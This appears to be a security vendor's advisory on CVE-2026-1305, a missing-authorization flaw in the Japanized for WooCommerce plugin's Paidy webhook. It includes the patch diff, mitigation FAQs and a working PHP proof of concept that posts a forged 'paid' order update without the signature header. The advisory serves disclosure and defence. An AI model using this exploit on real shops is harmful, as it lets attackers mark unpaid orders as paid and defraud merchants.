Atomic Edge analysis of CVE-2026-1305:
The root cause is a flawed authorization check in the `paidy_webhook_permission_check` function within the Japanized for WooCommerce plugin. The function unconditionally returned `true` when the `Paidy-Signature` HTTP header was absent, provided the request originated from an IP address within a configured whitelist. However, if no IP whitelist was configured, the function would still return `true` due to a missing default failure case, effectively bypassing authentication. Attackers can exploit this by sending a crafted POST request to the Paidy webhook endpoint at `/wp-json/jp4wc/paidypayment/` without a valid signature header. The payload must contain order data, such as `order_id` and `status` parameters, to trigger the `jp4wc_paidy_webhook` callback. This allows unauthenticated users to fraudulently update WooCommerce order statuses to “Processing” or “Completed” without payment. The patch modifies `class-wc-paidy-endpoint.php` lines 78-103. It adds explicit rejection logic when the signature header is missing and no IP whitelist is configured, returning a WP_Error with a 403 status. The patch also adds a final default rejection case. Successful exploitation impacts financial integrity by allowing order fulfillment without payment.
CVE-2026-1305: Japanized for WooCommerce <= 2.8.4 – Missing Authorization to Unauthenticated Paidy Order Manipulation (woocommerce-for-japan)
CVE-2026-1305
woocommerce-for-japan
2.8.4
2.8.5
Analysis Overview
Differential between vulnerable and patched code
--- a/woocommerce-for-japan/includes/gateways/paidy/class-wc-paidy-endpoint.php
+++ b/woocommerce-for-japan/includes/gateways/paidy/class-wc-paidy-endpoint.php
@@ -78,7 +78,16 @@
array( 'status' => 403 )
);
}
+ // IP validation passed.
+ return true;
}
+
+ // No signature AND no IP whitelist configured - REJECT.
+ return new WP_Error(
+ 'paidy_unauthorized',
+ __( 'Missing signature header for Paidy webhook.', 'woocommerce-for-japan' ),
+ array( 'status' => 403 )
+ );
}
// Verify the signature if present.
@@ -103,9 +112,16 @@
array( 'status' => 403 )
);
}
+ // Signature validation passed.
+ return true;
}
- return true;
+ // Should never reach here, but reject by default.
+ return new WP_Error(
+ 'paidy_unauthorized',
+ __( 'Unauthorized access to Paidy webhook.', 'woocommerce-for-japan' ),
+ array( 'status' => 403 )
+ );
}
/**
--- a/woocommerce-for-japan/woocommerce-for-japan.php
+++ b/woocommerce-for-japan/woocommerce-for-japan.php
@@ -5,7 +5,7 @@
* Description: Woocommerce toolkit for Japanese use.
* Author: Artisan Workshop
* Author URI: https://wc.artws.info/
- * Version: 2.8.4
+ * Version: 2.8.5
* Requires PHP: 8.1
* Requires Plugins: woocommerce
* Requires at least: 6.7
@@ -25,7 +25,7 @@
exit; // Exit if accessed directly.
}
-define( 'JP4WC_VERSION', '2.8.4' );
+define( 'JP4WC_VERSION', '2.8.5' );
require_once __DIR__ . '/class-jp4wc.php';
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1305 - Japanized for WooCommerce <= 2.8.4 - Missing Authorization to Unauthenticated Paidy Order Manipulation
<?php
$target_url = 'http://example.com/wp-json/jp4wc/paidypayment/';
// Replace with a valid order ID from the target site.
$order_id = 123;
// Craft a payload mimicking a Paidy webhook notification to mark an order as paid.
$payload = json_encode([
'order_id' => $order_id,
'status' => 'paid',
'payment_id' => 'fake_payment_'.time(),
'amount' => 1000,
'currency' => 'JPY'
]);
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The exploit requires OMITTING the 'Paidy-Signature' header to trigger the bypass.
$headers = [
'Content-Type: application/json',
// Do not set Paidy-Signature header.
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Code: $http_coden";
echo "Response: $responsen";
// A 200 OK or successful order update message indicates potential vulnerability.
?>Frequently Asked Questions
What is CVE-2026-1305?
Overview of the vulnerabilityCVE-2026-1305 is a security vulnerability in the Japanized for WooCommerce plugin for WordPress, affecting versions up to 2.8.4. It allows unauthenticated attackers to manipulate order statuses without proper payment verification due to a flawed permission check.
How does this vulnerability work?
Mechanism of exploitationThe vulnerability arises from the `paidy_webhook_permission_check` function, which improperly authorizes requests when the `Paidy-Signature` header is missing. Attackers can send crafted POST requests to the webhook endpoint to change order statuses to ‘Processing’ or ‘Completed’ without actual payment.
Who is affected by this vulnerability?
Identifying vulnerable installationsAny WordPress site using the Japanized for WooCommerce plugin version 2.8.4 or earlier is affected. Site administrators should check their installed plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verificationTo check if your site is vulnerable, verify the version of the Japanized for WooCommerce plugin installed. If it is version 2.8.4 or earlier, your site is susceptible to this vulnerability.
How can I fix this vulnerability?
Updating the pluginThe vulnerability is patched in version 2.8.5 of the Japanized for WooCommerce plugin. Updating to this version will resolve the issue and restore proper authorization checks.
What should I do if I cannot update the plugin immediately?
Mitigation strategiesIf immediate updates are not possible, consider disabling the Paidy payment gateway temporarily to prevent exploitation. Additionally, ensure that your server’s firewall is configured to restrict access to the webhook endpoint.
What does a CVSS score of 5.3 indicate?
Understanding risk levelsA CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions on your site.
What is the practical risk of this vulnerability?
Impact on business operationsThe practical risk includes potential financial loss and damage to the integrity of order fulfillment processes. Attackers could fraudulently mark orders as paid, leading to unauthorized transactions and loss of revenue.
How does the proof of concept demonstrate the vulnerability?
Exploitation exampleThe proof of concept provided shows how an attacker can send a crafted POST request to the vulnerable endpoint without including the required `Paidy-Signature` header. This demonstrates the ease of bypassing authentication and manipulating order statuses.
What changes were made in the patched version?
Details of the fixIn the patched version 2.8.5, explicit rejection logic was added to handle cases where the signature header is missing. This ensures that unauthorized requests are properly denied, preventing exploitation.
Is there a way to monitor for exploitation attempts?
Preventive measuresSite administrators can implement logging for webhook requests and monitor for unusual activity, such as requests without the `Paidy-Signature` header. This can help identify potential exploitation attempts.
Where can I find more information about this vulnerability?
Additional resourcesMore information about CVE-2026-1305 can be found on the official CVE database and security advisories from the plugin developers. Keeping abreast of security updates is crucial for maintaining site integrity.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
